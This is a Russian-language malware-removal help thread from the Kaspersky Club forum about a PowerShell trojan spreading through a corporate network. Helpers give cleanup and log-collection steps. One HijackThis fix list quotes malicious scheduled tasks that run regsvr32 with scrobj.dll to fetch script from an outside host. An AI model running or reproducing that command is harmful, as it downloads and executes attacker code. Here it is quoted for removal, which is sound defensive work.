Перейти к содержанию
Правила раздела
Объявляем набор участников в программу «Развитие сообществ клуба в мессенджерах»
Конкурс по разработке Telegram-бота Kaspersky Club

троян powershall разлетелся по сети

Максим Павельев

Автор Максим Павельев
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Максим Павельев Продвинутый

Максим Павельев

Опубликовано
Опубликовано

Добрый день.

Троян powershell.exe разлетелся по всей корпоративной сети( нагружает ЦП до 100% и делает работу ПК невозможной.

удалил его dr.web Cureit, но он снова появляется.

помогите пожалуйста

есть ли какое лекарство что бы убрать его со всех ПК?
 

Ссылка на комментарий
Поделиться на другие сайты
  • Ответов 37
  • Создана
  • Последний ответ

Топ авторов темы

  • Максим Павельев

    19

  • Sandor

    17

  • regist

    2

Популярные дни

Топ авторов темы

Популярные дни

Популярные посты

Sandor
Sandor

Здесь больше ничего плохого не видно.   Проверьте уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе Запустите двойным щелчком мыши (если Вы и

Sandor
Sandor

Всё найденное можно удалить (поместить в карантин).

Sandor
Sandor

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запусти

Изображения в теме

Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Вам известны правила этой ветки форума. Если нужно только обсудить способ, сообщите и перенесем в другую.

Ссылка на комментарий
Поделиться на другие сайты
Максим Павельев Продвинутый

Максим Павельев

Опубликовано
  • Автор
Опубликовано

Здравствуйте!

 

Вам известны правила этой ветки форума. Если нужно только обсудить способ, сообщите и перенесем в другую.

извините пожалуйста.

почему то не прикрепился лог.

да, мне нужен способ и уничтожения вируса.

спасибо

CollectionLog-2019.01.28-14.41.zip

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

"Пофиксите" в HijackThis:

O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: System Log Security Check - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O22 - Task: Upd7Live - C:\Windows\Upd7Live.exe /exec=DevCon (file missing)
O22 - Task: WindowsLogTasks - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1
Перезагрузите компьютер вручную и соберите свежий CollectionLog.
Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Здесь больше ничего плохого не видно.

 

Проверьте уязвимые места:

  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
Если нужно проверить другой компьютер, создайте для него отдельную тему.
  • Спасибо (+1) 1
Ссылка на комментарий
Поделиться на другие сайты
Максим Павельев Продвинутый

Максим Павельев

Опубликовано
  • Автор
Опубликовано

@Sandor, скажите, у меня все это разошлось по всем ПК в сети, это примерно 50 штук. Нужно каждый ручками теперь зачищать?

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Это не универсальное решение. Фикс написан только для указанного компьютера.

Давайте посмотрим еще пару компьютеров с похожими симптомами, далее будет понятно как действовать.

Смотрите также настройки вашего антивируса - почему это произошло и т.д.

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

 

 


что бы вы путались)
путаница это когда в одной теме логи с разных систем.

 

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:

  1. Запустите AVZ.
  2. Запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  3. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  4. Закачайте полученный архив, как описано на этой странице.
  5. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: Яндекс.Диск, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.


 

PS. эта процедура универсальная, так что желательно это проделать и на остальных.

Ссылка на комментарий
Поделиться на другие сайты
Максим Павельев Продвинутый

Максим Павельев

Опубликовано
  • Автор
Опубликовано

 

Проверьте уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе

Это сделайте.

 

выполнил

SecurityCheck.txt

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • mrolya
      [РЕШЕНО] Не удаляется троян после лечения: HEUR:Trojan.Multi.Powedon.d
      Автор mrolya
      Не удаляется троян HEUR:Trojan.Multi.Powedon.d, касперский находит его, делает лечение и ребутает комп, после ребута запускает сканирование и троян снова появляется, в общем все идет по кругу.
       

      CollectionLog-2025.04.21-11.37.zip
    • RedKaroliner
      [РЕШЕНО] Удалены ли трояны
      Автор RedKaroliner
      Здравствуйте!
      Использовал антивирус Касперского 3 раза. После первого и второго сканирования он показывал наличие троянов, я выбирал везде пункт "удалить". В третий раз после сканирования ничего не обнаружил. Хотелось бы понять, остались ли на компьютере трояны, или он чист.
      CollectionLog-2025.03.24-17.46.zip
    • Maksum
      [РЕШЕНО] Трояны
      Автор Maksum
      Скачал вирус в папку temp и %temp%
      Через несколько дней появилось несколько троянов.
      Во время игры, игра свернулась и вышло окно от некого хакера и было написано напиши мне я быстро перезагрузил пк, вошёл в безопасный режим  и начал чистить его с помощью Dr web как очистил трояны ноутбук начал лагать но без троянов чуть позже перепроверил им же оказалось опять появились те же трояны. Теперь даже боюсь лишний раз ноут включать(
      Скиньте пожалуйста скрипт для avz.
      Мой виндовс: 10 домашняя версия для 1 языка 64 бит
      Вот файл с троянами:
      Fitnes.rar
    • Егоррр
      Троян - MEM:Trojan.Win32.SEPEH
      Автор Егоррр
      Решил на свою голову скачать книгу в электронном виде. Теперь не могу избавиться. Отчет предоставлен от программы Farbar Recovery Scan Tool. Компьютер страшно тормозит. Делать что либо не возможно. С горе пополам скачал kaspersky tools и Dr.web. Удалить не получилось 

      отчет.rar
    • Mutabor
      Моя домашняя сеть в составе ботсети.
      Автор Mutabor
      Здравствуйте, моя домашняя сеть подключена к ботсети. Я узнал об этом из Касперского, зайдя в мониторинг умного дома увидел, что к моей домашней сети подключено 250 устройств.
      Ранее хакер взломал мой роутер и почту, поменяв пороли. Я все пароли поменял,
      на сложные, использовав генератор паролей, на почту смог войти по отпечатку пальца через смарфон, а роутер перезагрузил.
      Для того чтобы выйти из этой бот сети я создал в роутере белый список, привезав мак адреса моих устройств, так же создал гостевую сеть и перенаправил в нее устройства которые не поддерживают шифрования WAN 3 personal, это две колонки Алиса и телевизор. Три устройства поддерживающие это шифрование я оставил в основной сети. Это два смартфона и андроид телевизор.
      После этого Касперский показал что я вышел из ботсети, однако на следующее утро я снова увидел, что являюсь её участником.
      Так же на компьютере Касперский пишет, что у меня открыт 22 SSH порт, как его закрыть на моем роутере TP-Link Archer C80 я не знаю, перерыл всё меню. интернет, задавал вопрос ии, ответа так и не нашёл.
      Хотя я заходил на  https://www.yougetsignal.com/tools/open-ports/ чтобы проверить открыт ли этот порт у меня, пишет что порт закрыт.
      Осталась единственная надежда на вас, может вы сможете помочь, пожалуйста помогите выйти из этой ботсети.
×
×
  • Создать...